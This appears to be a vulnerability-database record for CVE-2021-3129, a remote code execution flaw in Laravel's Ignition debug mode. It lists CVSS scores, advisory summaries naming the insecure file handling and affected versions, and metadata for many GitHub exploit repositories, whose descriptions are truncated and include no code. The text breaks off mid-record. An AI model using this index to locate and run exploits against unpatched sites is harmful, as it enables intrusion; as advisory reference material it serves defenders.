Exploit for Vulnerability in Facade Ignition

2021-01-27T10:16:35

Description

# CVE-2021-3129_exploit Exploit for CVE-2021-3129 ## Lab setup: ...

{"id": "6E0E7058-958F-5D83-9BC3-AC9A1571D8AC", "vendorId": null, "type": "githubexploit", "bulletinFamily": "exploit", "title": "Exploit for Vulnerability in Facade Ignition", "description": "# CVE-2021-3129_exploit\nExploit for CVE-2021-3129\n## Lab setup:\n...", "published": "2021-01-27T10:16:35", "modified": "2022-08-10T06:02:18", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "", "reporter": "", "references": [], "cvelist": ["CVE-2021-3129"], "immutableFields": [], "lastseen": "2022-08-10T06:51:04", "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:5E9429E0-21B2-448F-8137-A7FDE1EA5C48"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0030"]}, {"type": "cve", "idList": ["CVE-2021-3129"]}, {"type": "github", "idList": ["GHSA-4QWP-7C67-JMCC"]}, {"type": "githubexploit", "idList": ["015776ED-F570-51F6-BD7B-6A422942FCBB", "272FC334-4DD4-570F-AB53-1BF7758BA869", "35896337-DA85-5D42-B9FC-4DF2E3EC881E", "472CD5C0-023D-5465-BAD9-83CF49B2139D", "4EE21D54-330E-5291-B612-7D80CD427AB7", "501BA9BB-F145-529E-BFA9-62A94BCB6191", "5E9C0870-F853-5E81-8E8C-A056A9C414DE", "7407E081-4DB0-50D7-AC00-42DC86BACF6D", "86E0EEED-C430-5343-BCD1-3FF58D995440", "AF827A23-A60A-565F-B2B6-E5038132A33A", "B4031542-31ED-5A0E-934F-8523687B36BF", "B57BBC1D-AC88-5370-9A63-B487A1331956", "DF739DCB-597D-5266-BFD7-DD6EDEB4ABA4", "FE9CDF3B-2AEE-5EA8-8B5B-5210E82BF169"]}, {"type": "osv", "idList": ["OSV:GHSA-4QWP-7C67-JMCC"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162094", "PACKETSTORM:165999"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:682AF2364002B8852065C1D4694ED089"]}, {"type": "veracode", "idList": ["VERACODE:28976"]}, {"type": "zdt", "idList": ["1337DAY-ID-36079", "1337DAY-ID-37366"]}]}, "score": {"value": -0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:5E9429E0-21B2-448F-8137-A7FDE1EA5C48"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0030"]}, {"type": "cve", "idList": ["CVE-2021-3129"]}, {"type": "github", "idList": ["GHSA-4QWP-7C67-JMCC"]}, {"type": "githubexploit", "idList": ["272FC334-4DD4-570F-AB53-1BF7758BA869", "472CD5C0-023D-5465-BAD9-83CF49B2139D", "501BA9BB-F145-529E-BFA9-62A94BCB6191", "5E9C0870-F853-5E81-8E8C-A056A9C414DE", "7407E081-4DB0-50D7-AC00-42DC86BACF6D", "AF827A23-A60A-565F-B2B6-E5038132A33A", "B57BBC1D-AC88-5370-9A63-B487A1331956", "FE9CDF3B-2AEE-5EA8-8B5B-5210E82BF169"]}, {"type": "kitploit", "idList": ["KITPLOIT:3449843613571411531"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162094"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:682AF2364002B8852065C1D4694ED089"]}, {"type": "threatpost", "idList": ["THREATPOST:99DC4B497599503D640FDFD9A2DC5FA3"]}, {"type": "zdt", "idList": ["1337DAY-ID-36079"]}]}, "exploitation": null, "vulnersScore": -0.2}, "_state": {"dependencies": 1660114366, "score": 1660114387}, "_internal": {"score_hash": "1f20e9558656993ea710146d62e4e49b"}, "privateArea": 1}

{"veracode": [{"lastseen": "2022-07-26T13:32:51", "description": "facade/ignition is vulnerable to arbitrary code execution. The vulnerability exists through stream wrappers in files that do not end of `.blade.php` in `MakeViewVariableOptionalSolution`.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T02:33:13", "type": "veracode", "title": "Arbitrary Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-02-22T11:30:31", "id": "VERACODE:28976", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-28976/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2022-05-12T01:19:27", "description": "Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-29T20:23:46", "type": "osv", "title": "Unauthenticated remote code execution in Ignition", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2021-03-23T00:13:45", "id": "OSV:GHSA-4QWP-7C67-JMCC", "href": "https://osv.dev/vulnerability/GHSA-4qwp-7c67-jmcc", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:34:48", "description": "A remote code execution vulnerability exists in Laravel Ignition. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-01T00:00:00", "type": "checkpoint_advisories", "title": "Laravel Ignition Remote Code Execution (CVE-2021-3129)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2021-02-01T00:00:00", "id": "CPAI-2021-0030", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-06-17T05:17:58", "description": "# CVE-2021-3129\nPoC for CVE-2021-3129 (Laravel)\n\nFor educational...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-01T09:09:38", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-06-17T01:52:54", "id": "272FC334-4DD4-570F-AB53-1BF7758BA869", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-21T12:48:02", "description": "# Laravel_CVE-2021-3129_EXP\n\u53c2\u8003exp: https://github.com/SNC...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-27T05:44:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-07-21T09:16:22", "id": "FE9CDF3B-2AEE-5EA8-8B5B-5210E82BF169", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-31T20:42:34", "description": "# Laravel-CVE-2021-3129\nCVE-2021-3129\n\n\n\n## \u63cf\u8ff0\n\n\u6574\u5408https://githu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T10:58:47", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-07-31T02:37:00", "id": "DF739DCB-597D-5266-BFD7-DD6EDEB4ABA4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-11T15:20:45", "description": "# laravel-CVE-2021-3129-EXP\n\nCVE-2021-312...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-25T08:42:28", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-08-11T07:46:44", "id": "015776ED-F570-51F6-BD7B-6A422942FCBB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-12T10:44:35", "description": "# CVE-2021-3129\nCVE-2021-3129-Laravel Debug mode \u8fdc\u7a0b\u4ee3\u7801\u6267...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-21T06:27:18", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-08-12T03:18:26", "id": "B57BBC1D-AC88-5370-9A63-B487A1331956", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-10T15:49:15", "description": "# CVE-2021-3129\nLaravel debug rce\n\n# \u98df\u7528\u65b9\u6cd5\n\u6267\u884c`docker-compse up -d...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-22T05:12:21", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-08-10T11:46:01", "id": "5E9C0870-F853-5E81-8E8C-A056A9C414DE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:13:52", "description": "### \u4e3b\u8981\u529f\u80fd\n\t\u9488\u5bf9CVE-2021-3129\u6f0f\u6d1e\u8fdb\u884cGetshell\n\n### \u4f7f\u7528\u65b9\u6cd5\n pyt...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-06T14:24:54", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2021-11-06T14:27:50", "id": "86E0EEED-C430-5343-BCD1-3FF58D995440", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-16T16:46:45", "description": "# CVE-2021-3129\nLaravel <= v8.4.2 debug mode: Remote code exe...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-18T05:42:13", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-08-16T07:16:17", "id": "AF827A23-A60A-565F-B2B6-E5038132A33A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T22:37:12", "description": "# laravel-exploits\nExploit for CVE-2021-3129\nDetails: https://ww...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T12:52:20", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-08-15T12:34:47", "id": "501BA9BB-F145-529E-BFA9-62A94BCB6191", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T02:40:17", "description": "# CVE-2021-3129\nLaravel <= v8.4.2 debug mode: Remote code exe...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-08T06:34:17", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-05-22T16:10:29", "id": "4EE21D54-330E-5291-B612-7D80CD427AB7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T14:50:57", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-14T09:24:07", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2021-10-24T10:23:11", "id": "472CD5C0-023D-5465-BAD9-83CF49B2139D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T15:02:45", "description": "# laravel-CVE-2021-3129-EXP\n\nCVE-2021-312...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T07:35:04", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-03-01T08:06:10", "id": "B4031542-31ED-5A0E-934F-8523687B36BF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-08T20:10:03", "description": "# CVE-2021-3129 - Laravel RCE\n\n## About\nThe script has been made...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-16T17:22:55", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-07-08T16:50:20", "id": "35896337-DA85-5D42-B9FC-4DF2E3EC881E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:30:25", "description": "## Introduction\nThe application is used for tracking people acco...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": 